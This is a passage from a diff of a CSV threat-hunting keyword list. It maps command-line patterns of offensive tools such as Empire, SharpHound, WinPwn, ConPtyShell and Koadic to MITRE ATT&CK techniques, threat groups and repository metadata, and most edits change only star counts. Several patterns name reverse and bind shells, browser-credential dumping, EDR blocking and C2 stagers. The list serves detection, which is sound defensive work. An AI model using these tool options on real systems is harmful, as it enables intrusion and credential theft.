- T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --collectionmethods ACL*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods ComputerOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Container*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods DCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods DCOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods GPOLocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Group*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods LocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods LoggedOn*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods ObjectProps*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods PSRemote*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods RDP*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Session*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Trusts*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* com.blackh4t*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* --command * --output payload*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* -command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* ComputerDefaults.exe*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"* -ComputerName -ServiceEXE *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"* -config modlishka.json *","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"* Configuring Windows Firewall rules to block EDR network access*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"* ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"* -consoleoutput -browsercredentials*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* -consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* -consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* -ConType bind *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -ConType reverse *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ComputerName -ServiceEXE *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"* -config modlishka.json *","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"* Configuring Windows Firewall rules to block EDR network access*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"* ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"* -consoleoutput -browsercredentials*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -ConType bind *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ConType reverse *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --copy-file --source-file *.docx --target-file *.docx --target-volume *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "* core.payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* core.stager *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --crack-status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --crawl=*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --crack-status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --crawl=*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* crawler.py -u http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - 